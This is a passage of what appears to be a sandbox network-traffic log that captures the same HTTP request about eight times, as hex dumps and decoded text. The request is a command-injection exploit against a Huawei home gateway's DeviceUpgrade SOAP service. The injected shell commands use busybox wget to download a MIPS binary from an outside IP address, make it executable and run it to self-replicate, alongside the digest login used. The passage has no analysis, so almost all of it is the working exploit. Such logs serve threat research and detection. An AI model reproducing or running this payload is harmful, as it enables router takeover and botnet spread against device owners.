6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 